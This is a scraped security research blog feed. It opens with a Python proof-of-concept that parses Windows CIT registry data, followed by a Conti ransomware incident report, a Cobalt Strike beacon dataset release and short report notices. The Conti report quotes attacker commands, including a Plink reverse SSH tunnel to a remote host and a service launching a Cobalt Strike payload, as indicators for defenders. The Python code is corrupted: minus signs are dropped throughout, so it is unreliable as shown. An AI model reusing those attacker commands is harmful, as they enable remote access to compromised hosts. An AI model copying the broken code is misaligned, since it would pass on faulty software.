DWORD Count;
DWORD Duration;
} CIT_SPAN_STAT_ITEM;
typedef struct _CIT_SYSTEM_DATA_SPAN_STATS {
CIT_SPAN_STAT_ITEM ContextFlushes0;
CIT_SPAN_STAT_ITEM Foreground0;
CIT_SPAN_STAT_ITEM Foreground1;
CIT_SPAN_STAT_ITEM DisplayPower0;
CIT_SPAN_STAT_ITEM DisplayRequestChange;
CIT_SPAN_STAT_ITEM DisplayPower1;
CIT_SPAN_STAT_ITEM DisplayPower2;
CIT_SPAN_STAT_ITEM DisplayPower3;
CIT_SPAN_STAT_ITEM ContextFlushes1;
CIT_SPAN_STAT_ITEM Foreground2;
CIT_SPAN_STAT_ITEM ContextFlushes2;
} CIT_SYSTEM_DATA_SPAN_STATS;
typedef struct _CIT_USE_DATA_SPAN_STATS {
CIT_SPAN_STAT_ITEM ProcessCreation0;
CIT_SPAN_STAT_ITEM Foreground0;
CIT_SPAN_STAT_ITEM Foreground1;
CIT_SPAN_STAT_ITEM Foreground2;
CIT_SPAN_STAT_ITEM ProcessSuspended;
CIT_SPAN_STAT_ITEM ProcessCreation1;
} CIT_USE_DATA_SPAN_STATS;
typedef struct _CIT_SYSTEM_DATA_STATS {
WORD Unknown_BootIdRelated0;
WORD Unknown_BootIdRelated1;
WORD Unknown_BootIdRelated2;
WORD Unknown_BootIdRelated3;
WORD Unknown_BootIdRelated4;
WORD SessionConnects;
WORD ProcessForegroundChanges;
WORD ContextFlushes;
WORD MissingProgData;
WORD DesktopSwitches;
WORD WinlogonMessage;
WORD WinlogonLockHotkey;
WORD WinlogonLock;
WORD SessionDisconnects;
} CIT_SYSTEM_DATA_STATS;
typedef struct _CIT_USE_DATA_STATS {
WORD Crashes;
WORD ThreadGhostingChanges;
WORD Input;
WORD InputKeyboard;
WORD Unknown;
WORD InputTouch;
WORD InputHid;
WORD InputMouse;
WORD MouseLeftButton;
WORD MouseRightButton;
WORD MouseMiddleButton;
WORD MouseWheel;
} CIT_USE_DATA_STATS;
// PUU
typedef struct _CIT_POST_UPDATE_USE_INFO {
DWORD UpdateKey;
WORD UpdateCount;
WORD CrashCount;
WORD SessionCount;
WORD LogCount;
DWORD UserActiveDurationInS;
DWORD UserOrDispActiveDurationInS;
DWORD DesktopActiveDurationInS;
WORD Version;
WORD _Unk0;
WORD BootIdMin;
WORD BootIdMax;
DWORD PMUUKey;
DWORD SessionDurationInS;
DWORD SessionUptimeInS;
DWORD UserInputInS;
DWORD MouseInputInS;
DWORD KeyboardInputInS;
DWORD TouchInputInS;
DWORD PrecisionTouchpadInputInS;
DWORD InForegroundInS;
DWORD ForegroundSwitchCount;
DWORD UserActiveTransitionCount;
DWORD _Unk1;
FILETIME LogTimeStart;
QWORD CumulativeUserActiveDurationInS;
WORD UpdateCountAccumulationStarted;
WORD _Unk2;
DWORD BuildUserActiveDurationInS;
DWORD BuildNumber;
DWORD _UnkDeltaUserOrDispActiveDurationInS;
DWORD _UnkDeltaTime;
DWORD _Unk3;
} CIT_POST_UPDATE_USE_INFO;
// DP
typedef struct _CIT_DP_MEMOIZATION_ENTRY {
DWORD Unk0;
DWORD Unk1;
DWORD Unk2;
} CIT_DP_MEMOIZATION_ENTRY;
typedef struct _CIT_DP_MEMOIZATION_CONTEXT {
_CIT_DP_MEMOIZATION_ENTRY Entries[12];
} CIT_DP_MEMOIZATION_CONTEXT;
typedef struct _CIT_DP_DATA {
WORD Version;
WORD Size;
WORD LogCount;
WORD CrashCount;
DWORD SessionCount;
DWORD UpdateKey;
QWORD _Unk0;
FILETIME _UnkTime;
FILETIME LogTimeStart;
DWORD ForegroundDurations[11];
DWORD _Unk1;
_CIT_DP_MEMOIZATION_CONTEXT MemoizationContext;
} CIT_DP_DATA;
"""
c_cit = cstruct.cstruct()
c_cit.load(cit_def)
class CIT:
def __init__(self, buf):
compressed_fh = io.BytesIO(buf)
compressed_size, uncompressed_size = struct.unpack("<2I", compressed_fh.read(8))
self.buf = lznt1_decompress(compressed_fh)
self.header = c_cit.CIT_HEADER(self.buf)
if self.header.MajorVersion != 0x0A:
raise ValueError("Unsupported CIT version")
digest = crc32(self.buf[0x14:], crc32(self.buf[:0x10]))
if self.header.Crc32 != digest:
raise ValueError("Crc32 mismatch")
system_data_buf = self.data(self.header.SystemDataOffset, self.header.SystemDataSize, 0x18)
self.system_data = SystemData(self, c_cit.CIT_PERSISTED(system_data_buf))
base_use_data_buf = self.data(self.header.BaseUseDataOffset, self.header.BaseUseDataSize, 0x18)
self.base_use_data = BaseUseData(self, c_cit.CIT_PERSISTED(base_use_data_buf))
entry_data = self.buf[self.header.EntryDataOffset :]
self.entries = [Entry(self, entry) for entry in c_cit.CIT_ENTRY[self.header.EntryCount](entry_data)]
def data(self, offset, size, expected_size=None):
if expected_size and size > expected_size:
size = expected_size
data = self.buf[offset : offset + size]
if expected_size and size < expected_size:
data.ljust(expected_size, b"\x00")
return data
def iter_bitmap(self, bitmap: bytes):
bit_delta = timedelta(seconds=self.header.BitPeriodInS)
ts = wintimestamp(self.header.PeriodStartLocal)
for byte in bitmap:
if byte == b"\x00":
ts += 8 * bit_delta
else:
for bit in range(8):
if byte & (1 << bit):
yield ts
ts += bit_delta
class Entry:
def __init__(self, cit, entry):
self.cit = cit
self.entry = entry
program_buf = cit.data(entry.ProgramDataOffset, entry.ProgramDataSize, 0x1C)
self.program_data = c_cit.CIT_PROGRAM_DATA(program_buf)
use_data_buf = cit.data(entry.UseDataOffset, entry.UseDataSize, 0x18)
self.use_data = ProgramUseData(cit, c_cit.CIT_PERSISTED(use_data_buf))
self.file_path = None
self.command_line = None
if self.program_data.FilePathOffset:
file_path_buf = cit.data(self.program_data.FilePathOffset, self.program_data.FilePathSize * 2)
self.file_path = file_path_buf.decode("utf-16-le")
if self.program_data.CommandLineOffset:
command_line_buf = cit.data(self.program_data.CommandLineOffset, self.program_data.CommandLineSize * 2)
self.command_line = command_line_buf.decode("utf-16-le")
def __repr__(self):
return f"<Entry file_path={self.file_path!r} command_line={self.command_line!r}>"
class BaseUseData:
MIN_BITMAPS_SIZE = 0x8
MIN_SPAN_STATS_SIZE = 0x30
MIN_STATS_SIZE = 0x18
def __init__(self, cit, entry):
self.cit = cit
self.entry = entry
bitmap_items = c_cit.CIT_BITMAP_ITEM[entry.BitmapsSize // len(c_cit.CIT_BITMAP_ITEM)](
cit.data(entry.BitmapsOffset, entry.BitmapsSize, self.MIN_BITMAPS_SIZE)
)
bitmaps = [cit.data(item.Offset, item.Size) for item in bitmap_items]
self.bitmaps = self._parse_bitmaps(bitmaps)
self.span_stats = self._parse_span_stats(
cit.data(entry.SpanStatsOffset, entry.SpanStatsSize, self.MIN_SPAN_STATS_SIZE)
)
self.stats = self._parse_stats(cit.data(entry.StatsOffset, entry.StatsSize, self.MIN_STATS_SIZE))
def _parse_bitmaps(self, bitmaps):
return BaseUseDataBitmaps(self.cit, bitmaps)
def _parse_span_stats(self, span_stats_data):
return None
def _parse_stats(self, stats_data):
return None
class BaseUseDataBitmaps:
def __init__(self, cit, bitmaps):
self.cit = cit
self._bitmaps = bitmaps
def _parse_bitmap(self, idx):
return list(self.cit.iter_bitmap(self._bitmaps[idx]))
class SystemData(BaseUseData):
MIN_BITMAPS_SIZE = 0x30
MIN_SPAN_STATS_SIZE = 0x58
MIN_STATS_SIZE = 0x1C
def _parse_bitmaps(self, bitmaps):
return SystemDataBitmaps(self.cit, bitmaps)
def _parse_span_stats(self, span_stats_data):
return c_cit.CIT_SYSTEM_DATA_SPAN_STATS(span_stats_data)
def _parse_stats(self, stats_data):
return c_cit.CIT_SYSTEM_DATA_STATS(stats_data)
class SystemDataBitmaps(BaseUseDataBitmaps):
def __init__(self, cit, bitmaps):
super().__init__(cit, bitmaps)
self.display_power = self._parse_bitmap(0)
self.display_request_change = self._parse_bitmap(1)
self.input = self._parse_bitmap(2)
self.input_touch = self._parse_bitmap(3)
self.unknown = self._parse_bitmap(4)
self.foreground = self._parse_bitmap(5)
class ProgramUseData(BaseUseData):
def _parse_bitmaps(self, bitmaps):
return ProgramDataBitmaps(self.cit, bitmaps)
def _parse_span_stats(self, span_stats_data):
return c_cit.CIT_USE_DATA_SPAN_STATS(span_stats_data)
def _parse_stats(self, stats_data):
return c_cit.CIT_USE_DATA_STATS(stats_data)
class ProgramDataBitmaps(BaseUseDataBitmaps):
def __init__(self, cit, use_data):
super().__init__(cit, use_data)
self.foreground = self._parse_bitmap(0)
# Some inlined utility functions for the purpose of the POC
def wintimestamp(ts, tzinfo=timezone.utc):
# This is a slower method of calculating Windows timestamps, but works on both Windows and Unix platforms
# Performance is not an issue for this POC
return datetime(1970, 1, 1, tzinfo=tzinfo) + timedelta(seconds=float(ts) * 1e-7 11644473600)
# LZNT1 derived from https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/filesystems/lznt1.py
def _get_displacement(offset):
"""Calculate the displacement."""
result = 0
while offset >= 0x10:
offset >>= 1
result += 1
return result
DISPLACEMENT_TABLE = array.array("B", [_get_displacement(x) for x in range(8192)])
COMPRESSED_MASK = 1 << 15
SIGNATURE_MASK = 3 << 12
SIZE_MASK = (1 << 12) 1
TAG_MASKS = [(1 << i) for i in range(0, 8)]
def lznt1_decompress(src):
"""LZNT1 decompress from a file-like object.
Args:
src: File-like object to decompress from.
Returns:
bytes: The decompressed bytes.
"""
offset = src.tell()
src.seek(0, io.SEEK_END)
size = src.tell() offset
src.seek(offset)
dst = io.BytesIO()
while src.tell() offset < size:
block_offset = src.tell()
uncompressed_chunk_offset = dst.tell()
block_header = struct.unpack("<H", src.read(2))[0]
if block_header & SIGNATURE_MASK != SIGNATURE_MASK:
break
hsize = block_header & SIZE_MASK
block_end = block_offset + hsize + 3
if block_header & COMPRESSED_MASK:
while src.tell() < block_end:
header = ord(src.read(1))
for mask in TAG_MASKS:
if src.tell() >= block_end:
break
if header & mask:
pointer = struct.unpack("<H", src.read(2))[0]
displacement = DISPLACEMENT_TABLE[dst.tell() uncompressed_chunk_offset 1]
symbol_offset = (pointer >> (12 displacement)) + 1
symbol_length = (pointer & (0xFFF >> displacement)) + 3
dst.seek(symbol_offset, io.SEEK_END)
data = dst.read(symbol_length)
# Pad the data to make it fit.
if 0 < len(data) < symbol_length:
data = data * (symbol_length // len(data) + 1)
data = data[:symbol_length]
dst.seek(0, io.SEEK_END)
dst.write(data)
else:
data = src.read(1)
dst.write(data)
else:
# Block is not compressed
data = src.read(hsize + 1)
dst.write(data)
result = dst.getvalue()
return result
def print_bitmap(name, bitmap, indent=8):
print(f"{' ' * indent}{name}:")
for entry in bitmap:
print(f"{' ' * (indent + 4)}{entry}")
def print_span_stats(span_stats, indent=8):
for key, value in span_stats._values.items():
print(f"{' ' * indent}{key}: {value.Count} times, {value.Duration}ms")
def print_stats(stats, indent=8):
for key, value in stats._values.items():
print(f"{' ' * indent}{key}: {value}")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("input", type=argparse.FileType("rb"), help="path to SOFTWARE hive file")
parser.add_argument("–tz", default="UTC", help="timezone to use for parsing local timestamps")
args = parser.parse_args()
if not HAS_ZONEINFO:
print("[!] zoneinfo module not available, falling back to UTC")
tz = timezone.utc
else:
tz = ZoneInfo(args.tz)
hive = Registry.Registry(args.input)
try:
cit_key = hive.open("Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\System")
except Registry.RegistryKeyNotFoundException:
parser.exit("No CIT\\System key found in the hive specified!")
for cit_value in cit_key.values():
data = cit_value.value()
if len(data) <= 8:
continue
print(f"Parsing {cit_value.name()}")
cit = CIT(data)
print("Period start:", wintimestamp(cit.header.PeriodStartLocal, tz))
print("Start time:", wintimestamp(cit.header.StartTimeLocal, tz))
print("Current time:", wintimestamp(cit.header.CurrentTimeLocal, tz))
print("Bit period in hours:", cit.header.BitPeriodInS // 60 // 60)
print("Aggregation period in hours:", cit.header.AggregationPeriodInS // 60 // 60)
print()
print("System:")
print(" Bitmaps:")
print_bitmap("Display power", cit.system_data.bitmaps.display_power)
print_bitmap("Display request change", cit.system_data.bitmaps.display_request_change)
print_bitmap("Input", cit.system_data.bitmaps.input)
print_bitmap("Input (touch)", cit.system_data.bitmaps.input_touch)
print_bitmap("Unknown", cit.system_data.bitmaps.unknown)
print_bitmap("Foreground", cit.system_data.bitmaps.foreground)
print(" Span stats:")
print_span_stats(cit.system_data.span_stats)
print(" Stats:")
print_stats(cit.system_data.stats)
print()
for i, entry in enumerate(cit.entries):
print(f"Entry {i}:")
print(" File path:", entry.file_path)
print(" Command line:", entry.command_line)
print(" PE TimeDateStamp", datetime.fromtimestamp(entry.program_data.PeTimeDateStamp, tz=timezone.utc))
print(" PE CheckSum", hex(entry.program_data.PeCheckSum))
print(" Extra 3:", entry.program_data.Extra3)
print(" Bitmaps:")
print_bitmap("Foreground", entry.use_data.bitmaps.foreground)
print(" Span stats:")
print_span_stats(entry.use_data.span_stats)
print(" Stats:")
print_stats(entry.use_data.stats)
print()
if __name__ == "__main__":
main()
view raw cit.py hosted with ❤ by GitHub

Public Report – Google Enterprise API Security Assessment

7 April 2022 at 20:06

During the autumn of 2021, Google engaged NCC Group to perform a review of the Android 12 Enterprise API to evaluate its compliance with the Security Technical Implementation Guides (STIG) matrix provided by Google.

This assessment was also performed with reference to the Common Criteria Protection Profile for Mobile Device Fundamentals (PPMDF), from which the STIG was derived.

Due to the limited nature of the testing, certain elements of the STIG requirements are expected to be covered separately either via FIPS 140-2 or Common Criteria Evaluation.

The Public Report for this review may be downloaded below:

Conti-nuation: methods and techniques observed in operations post the leaks

Authored by: Nikolaos Pantazopoulos, Alex Jessop and Simon Biggs

Executive Summary

In February 2022, a Twitter account which uses the handle ‘ContiLeaks’, started to publicly release information for the operations of the cybercrime group behind the Conti ransomware. The leaked data included private conversations between members along with source code of various panels and tools (e.g. Team9 backdoor panel [1]). Furthermore, even though the leaks appeared to have a focus on the people behind the Conti operations, the leaked data confirmed (at least to the public domain) that the Conti operators are part of the group, which operates under the ‘TheTrick’ ecosystem. For the past few months, there was a common misconception that Conti was a different entity.

Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware. This post describes the methods and techniques we observed during recent incidents that took place after the Conti data leaks.

Our findings can be summarised as below:

  • Multiple different initial access vectors have been observed.
  • The operator(s) use service accounts of the victim’s Antivirus product in order to laterally move through the estate and deploy the ransomware.
  • After getting access, the operator(s) attempted to remove the installed Antivirus product through the execution of batch scripts.
  • To achieve persistence in the compromised hosts, multiple techniques were observed;
    • Service created for the execution of Cobalt Strike.
    • Multiple legitimate remote access software, ‘AnyDesk’, ‘Splashtop’ and ‘Atera’, were deployed. (Note: This has been reported in the past too by different vendors)
      • Local admin account ‘Crackenn’ created. (Note: This has been previously reported by Truesec as a Conti behaviour [2])
  • Before starting the ransomware activity, the operators exfiltrated data from the network with the legitimate software ‘Rclone’ [3].

It should be noted that the threat actor(s) might use different tools or techniques in some stages of the compromise.

Initial Access

Multiple initial access vectors have been observed recently; phishing emails and the exploitation of Microsoft Exchange servers. The phishing email delivered to an employer proceeded to deploy Qakbot to the users Citrix session. The targeting of Microsoft Exchange saw ProxyShell and ProxyLogon vulnerabilities exploited. When this vector was observed, the compromise of the Exchange servers often took place two – three months prior to the post exploitation phase. This behaviour suggests that the team responsible for gaining initial access compromised a large number of estates in a small timeframe. 

With a number of engagements, it was not possible to ascertain the initial access due to dwell time and evidence retention. However, other initial access vectors utilised by the Conti operator(s) are:

  • Credential brute-force
  • Use of publicly available exploits. We have observed the following exploits being used:
    • Fortigate VPN
      • CVE-2018-13379
      • CVE-2018-13374
    • Log4Shell
      • CVE-2021-44228
  • Phishing e-mail sent by a legitimate compromised account.

Lateral Movement

In one incident, after gaining access to the first compromised host, we observed the threat actor carrying out the following actions:

  • Download AnyDesk from hxxps://37.221.113[.]100/anydesk.exe
  • Deployment of the following batch files:
    • 1.bat, 2.bat, 111.bat
      • Ransomware propagation
    • Removesophos.bat, uninstallSophos.bat
      • Uninstalls Sophos Antivirus solution
    • Aspx.bat
      • Contains a command-line, which executes the dropped executable file ‘ekern.exe’.
      • ‘ekern.exe’ is a command line connection tool known as Plink [4]
      • This file establishes a reverse SSH tunnel that allows direct RDP connection to the compromised host.
      • ekern.exe -ssh -P 53 -l redacted-pw redacted -R REDACTED_IP:59000:127.0.0.1:3389

After executing the above files, we observed the following utilities being used for reconnaissance and movement:

  • RDP
  • ADFind
  • Bloodhound to identify the network topology.
  • netscan.exe for network shares discovery.
  • Cobalt Strike deployed allowing the threat actor to laterally move throughout the network.

The common techniques across the multiple Conti engagements are the use of RDP and Cobalt Strike.

Persistence

The threat actor leveraged Windows services to add persistence for the Cobalt Strike beacon. The primary persistence method was a Windows service, an example can be observed below:

A service was installed in the system.

Service Name: REDACTED

Service File Name: cmd.exe /c C:\ProgramData\1.msi

Service Type: user mode service

Service Start Type: demand start

Service Account: LocalSystem

In addition, services were also installed to provide persistence for the Remote Access Tools deployed by the threat actor:

  • AnyDesk
  • Splashtop
  • Atera

Another Conti engagement saw no methods of persistence. However, a temporary service was created to execute Cobalt Strike. It is hypothesized that the threat actor planned to achieve their objective quickly and therefore used services for execution rather than persistence.

In a separate engagement, where the initial access vector was phishing and lead to the deployment of Qakbot, the threat actor proceeded to create a local admin account named ‘Crackenn’ for persistence on the host. 

Privilege Escalation

Conti operator(s) managed to escalate their privileges by compromising and using different accounts that were found in the compromised host. The credentials compromised in multiple engagements was achieved by deploying tools such as Mimikatz.

One operator was also observed exploiting ZeroLogon to obtain credentials and move laterally.

Exfiltration and Encryption

Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ was configured to upload to either Mega cloud storage provider or to a threat actor controlled server. Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.

As discussed earlier on, the average dwell time of a Conti compromise is heavily dependant on the initial access method. Those incidents that have involved ProxyShell and ProxyLogon, the time between initial access and lateral movement has been three – six months. However once lateral movement is conducted, time to completing their objective is a matter of days. 

Recommendations

  • Monitor firewalls for traffic categorised as filesharing
  • Monitor firewalls for anomalous spikes in data leaving the network
  • Patch externally facing services immediately
  • Monitor installed software for remote access tools
  • Restrict RDP and SMB access between hosts
  • Implement a Robust Password Policy [5]
  • Provide regular security awareness training

Indicators of Compromise

Indicator Value Indicator Type Description
37.221.113[.]100/anydesk.exe IP Address Hosts AnyDesk
103.253.208[.]79 IP Address Cobalt Strike command-and-control server
C:\ProgramData\1.msi Filename Cobalt Strike payload
C:\ProgramData\1.dll Filename Cobalt Strike payload
223.29.205[.]54 IP Address AnyDesk IP address of the operator.
C:\Windows\sv.exe Filename Rclone
C:\Windows\svchost.conf Filename Rclone config
E03AF25994222D4DC6EFD98AE65217A03A5B40EEDCFFAC45F098E2A6F68F3F41 SHA256 Sv.exe – Rclone
C:\Users\Public\Report_18.xls Filename Cobalt Strike payload
C:\Users\Public\x86_16.dll Filename Cobalt Strike payload
Crackenn Account Local admin account created on patient zero
C:\Users\<user>\AppData\Roaming\Microsoft\Abevi\<random characters>.dll Filename Qakbot payload
C:\Users\Public\AdFind.exe Filename ADFind
23.82.140[.]234 IP Address Cobalt Strike command-and-control server
23.81.246[.]179 IP Address Cobalt Strike command-and-control server
hijelurusa[.]com Domain Cobalt Strike command-and-control server

References

  1. https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/
  2. https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks
  3. https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
  4. https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html
  5. https://www.ncsc.gov.uk/collection/passwords/updating-your-approach

Whitepaper – Double Fetch Vulnerabilities in C and C++

28 March 2022 at 13:00

Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes. As much of this information is spread across various sources, this whitepaper draws the knowledge together into a single place, in order to better describe the different types of the vulnerability, how each type occurs, and the appropriate fixes.

This whitepaper may be downloaded below:


[Editor’s note: This whitepaper was updated on March 29th 2022 to correct minor formatting issues with the prior version.]

Mining data from Cobalt Strike beacons

25 March 2022 at 16:18

Since we published about identifying Cobalt Strike Team Servers in the wild just over three years ago, we’ve collected over 128,000 beacons from over 24,000 active Team Servers. Today, RIFT is making this extensive beacon dataset publicly available in combination with the open-source release of dissect.cobaltstrike, our Python library for studying and parsing Cobalt Strike related data.

The published dataset contains historical beacon metadata ranging from 2018 to 2022. This blog will highlight some interesting findings you can extract and query from this extensive dataset. We encourage other researchers also to explore the dataset and share exciting results with the community.

Cobalt Strike Beacon dataset

The dataset beacons.jsonl.gz is a GZIP compressed file containing 128,340 rows of beacon metadata as JSON-lines. You can download it from the following repository and make sure to also check out the accompanying Jupyter notebook:

The dataset spans almost four years of historical Cobalt Strike beacon metadata from July 2018 until February 2022. Unfortunately, we lost five months’ worth of data in 2019 due to archiving issues. In addition, the dataset mainly focuses on x86 beacons collected from active Team Servers on HTTP port 80, 443 and DNS; therefore, it does not contain any beacons from other sources, such as VirusTotal.

The beacon payloads themselves are not in the dataset due to the size. Instead, the different beacon configuration settings are stored, including other metadata such as:

  • Date the beacon was collected and from which IP address and port
  • GeoIP + ASN metadata
  • TLS certificate in DER format
  • PE information (timestamps, magic_mz, magic_pe, stage_prepend, stage_append)
  • If the payload was XOR encoded, and which XOR key was used for config obfuscation
  • The raw beacon configuration bytes; handy if you want to parse the beacon config manually. (e.g. using dissect.cobaltstrike or another parser of choice)

While there are some trivial methods to identify cracked/pirated Cobalt Strike Team Servers from the beacon payload, it’s difficult to tell for the non-trivial ones. Therefore the dataset is unfiltered, full disclosure and contains all beacons we have collected.

Cobalt Strike Team Servers that are properly hidden or have payload staging disabled are, of course, not included. That means Red Teams (and sadly threat actors) with good OPSEC have nothing to worry about being present in this dataset. 🙂

Beacons, and where to find them

The Cobalt Strike beacons were acquired by first identifying Team Servers on the Internet and then downloading the beacon using a checksum8 HTTP request. This method is similar to how the company behind Cobalt Strike did their own Cobalt Strike Team Server Population Study back in 2019. 

Although the anomalous space fingerprint we used for identification was since fixed, we found other reliable methods for identifying Team Servers. In addition, we are sure that the original author of Cobalt Strike intentionally left some indicators in there to help blue teams. For that, we are grateful and hope this doesn’t change in the future.

Via our honeypots, we can tell that RIFT is not alone in mining beacons. Everyone is doing it now. The increased blog posts and example scripts on how to find Cobalt Strike probably attribute to this, next to the increased popularity of Cobalt Strike itself, of course.

The development of increased scanning for Cobalt Strike is fascinating to witness, including the different techniques and shotgun approaches for identifying Team Servers and retrieving beacons. Some even skip the identification part and go directly for the beacon request! As you can imagine, this can be noisy, which surely doesn’t go unnoticed for some threat actors.

If you run a public-facing web server, you can easily verify this increased scanning by checking the HTTP access logs for common checksum8 like requests, for example, by using the following grep command:

$ zgrep -hE "GET /[a-zA-Z0-9]{4} HTTP" /var/log/nginx/*.gz
172.x.x.x - - [23/Feb/2021:18:xx:08 +0100] "GET /0bef HTTP/1.0” 404 162 "-" "-"
172.x.x.x - - [24/Feb/2021:09:xx:40 +0100] "GET /0bef HTTP/1.0” 404 162 "-" "-"
139.x.x.x - - [25/Feb/2021:05:xx:39 +0100] "GET /bag2 HTTP/1.1” 404 193 "-" "-"
134.x.x.x - - [25/Feb/2021:15:xx:12 +0100] "GET /ab2g HTTP/1.1” 400 166 "-" "-"
134.x.x.x - - [25/Feb/2021:15:xx:22 +0100] "GET /ab2h HTTP/1.1” 400 166 "-" "-"

The requests shown above are checksum8 requests (for x86 and x64 beacons), hitting a normal webserver hosting a real website in February 2021.

You can also use our checksum8-accesslogs.py script, which does all these things in one script and more accurately by verifying the checksum8 value. It can also output statistics. Here is an example of outputting the x86 and x64 beacon HTTP requests hitting one of our honeypots and generating the statistics:

checksum8-accesslog.py script finds possible Beacon stager requests in access logs

In the output, you can also see the different beacon scanning techniques being used, which we will leave as an exercise for the reader to figure out.

We can see an apparent increase in beacon scanning on one of our honeypots by plotting the statistics:

So if you ever wondered why people are requesting these weird four-character URLs (or other strange-looking URLs) on your web server, check the checksum8 value of the request, and you might have your answer.

We try to be a bit stealthier and won’t disclose our fingerprinting techniques, as we also know threat actors are vigilant and, in the long run, will make it harder for everyone dealing with Threat Intelligence.

Cobalt Strike version usage over time

Because we have beacon metadata over multiple years, we can paint a pretty good picture of active Cobalt Strike servers on the Internet and which versions they were using at that time.

To extract the Cobalt Strike version data, we used the following two methods:

  • Using the Beacon Setting constants
    • When a new Cobalt Strike beacon configuration setting is introduced, the Setting constant is increased and then assigned. It’s possible to deduce the version based on the highest available constant in the extracted beacon configuration.
  • Using the PE export timestamp

Our Python library dissect.cobaltstrike supports both methods for deducing version numbers and favours the PE export timestamp when available.

The dataset already contains the beacon_version field for your convenience and is based on the PE export timestamp. Using this field, we can generate the following graph showing the different Cobalt Strike versions used on the Internet over time:

We can see that in April 2021, there was quite a prominent peak of online Cobalt Strike servers and unique beacons, but we are not sure what caused this except that there was a 3% increase of modified (likely malicious) beacons that month.

The following percentage-wise graph shows a clearer picture of the adoption and popularity between the different versions over time:

We can see that Cobalt Strike 4.0 (released in December 2019) remained quite popular from January 2020 to January 2021.

Beacon watermark statistics

Since Cobalt Strike 3.10 (released December 2017), the beacons contain a setting called SETTING_WATERMARK. This watermark value should be unique per Cobalt Strike installation, as the license server issues this.

However, cracked/pirated versions usually patch this to a fixed value, making it easy to identify which beacons are more likely to be malicious (i.e. not a penetration tester). This likelihood aligns with our incident response engagements so far, where beacons related to the compromise used known-bad watermarks.

Note that requesting a trial or buying a legitimate copy of Cobalt Strike is difficult for malicious actors as every user is vetted and screened. Because of these measures, there is a high asking price for a Cobalt Strike copy on the dark web. For example, Conti invested $60.000 to acquire a valid copy of Cobalt Strike.

If you find a beacon with a watermark in this top 50, then it’s most likely malicious!

Customized Beacons

While parsing collected beacons, we found that some were modified, for example, with a custom shellcode stub, non-default XOR keys or reassigned Beacon settings.

Therefore, the beacons with heavy customizations could not be dumped properly and are not included in the dataset.

The configuration block in the beacon payload is usually obfuscated using a single byte XOR key. Depending on the Cobalt Strike version, the default keys are 0x2e or 0x69.

The use of non-default XOR keys requires the user to modify the beacon and or Team Server, as it’s not configurable by default. Here is an overview of seen XOR keys over the unique beacon dataset:

Using a custom XOR key makes you an outlier though, but it does protect you against some existing Cobalt Strike config dumpers. Our Python library dissect.cobaltstrike supports trying all XOR keys when the default XOR keys don’t work. For example, you can pass the command line flag --all-xor-keys to the beacon-dump command.

Portable Executable artifacts

While most existing Cobalt Strike dumpers focus on the beacon settings, some settings from the Malleable C2 profiles will not end up in the embedded beacon config of the payload. For example, some Portable Executable (PE) settings in the Malleable C2 profile are applied directly to the beacon payload. Our Python library dissect.cobaltstrike supports extracting this information, and our dataset includes the following extracted PE header metadata:

  • magic_mz — MZ header
  • magic_pe — PE header
  • pe_compile_stamp — PE compilation stamp
  • pe_export_stamp — timestamp of the export section
  • stage_prepend – (shellcode) bytes prepended to the start of the beacon payload
  • stage_append — bytes appended to the end of the beacon payload

We created an overview of the most common stage_prepend bytes that are all ASCII bytes. These bytes are prepended in front of the MZ header, and has to be valid assembly code but resulting in a no-operation as it’s executed as shellcode. Some are quite creative:

If we disassemble the example stage_prepend shellcode JFIFJFIF we can see that it increases the ESI and decreases the EDX registers and leaves it modified as a result; so it’s not fully a no-operation shellcode but it most likely doesn’t affect the staging process either.

$ echo -n JFIFJFIF | ndisasm -b 32 /dev/stdin
00000000  4A                dec edx
00000001  46                inc esi
00000002  49                dec ecx
00000003  46                inc esi
00000004  4A                dec edx
00000005  46                inc esi
00000006  49                dec ecx
00000007  46                inc esi

You can check our Jupyter notebook for an overview on the rest of the PE artifacts, such as magic_mz and magic_pe.

Watermarked releasenotes.txt using whitespace

The author of Cobalt Strike must really like spaces, after the erroneous space in the HTTP server header, there is now also a (repurposed) beacon setting called SETTING_SPAWNTO that is now populated with the MD5 hash of the file releasenotes.txt (or accidentally another file in the same directory if that matches the same checksum8 value of 152 and filename length!). 

The releasenotes.txt is automatically downloaded from the license server when you activate or update your Cobalt Strike server. To our surprise, we discovered that this file is most likely watermarked using whitespace characters thus making this file and MD5 hash unique per installation. The license server probably keeps track of all these uniquely generated files to help combat piracy and leaks of Cobalt Strike.

While this is pretty clever, we found that in some pirated beacons this field is all zeroes, or not available. Meaning they knew about this file and decided not to ship it in the pirated version or the field value was patched out. Nevertheless, this field is still useful for hunting or correlating beacons when it is available.

Note the subtle whitespace changes at the end of the lines between the two releasenotes.txt files. 

Analyze Beacon payloads with dissect.cobaltstrike

We are also proud to open-source our Python library for dissecting Cobalt Strike, aptly named dissect.cobaltstrike. The library is available on PyPI and requires Python 3.6 or higher. You can use pip to install it:

$ pip install dissect.cobaltstrike

The project’s GitHub repository: https://github.com/fox-it/dissect.cobaltstrike

It currently installs three command line tools for your convenience:

  • beacon-dump – used for dumping configuration from beacon payloads (also works on memory dumps)
  • beacon-xordecode – a standalone tool for decoding xorencoded payloads
  • c2profile-dump – use this to read and parse Malleable C2 profiles.

A neat feature of beacon-dump is to dump the beacon configuration back as it’s Malleable C2 profile compatible equivalent:

Dumping beacons settings as a Malleable C2 Profile

While these command line tools provide most of the boilerplate for working with Beacon payloads, you can also import the library in a script or notebook for more advanced use cases. See our notebook and documentation for some examples.

Closing thoughts

The beacon dataset has proved very useful to us, especially the historical aspect of the dataset is insightful during incident response engagements. We use the dataset daily, ranging from C2 infrastructure mapping, actor tracking, threat hunting, high-quality indicators, detection engineering and many more.

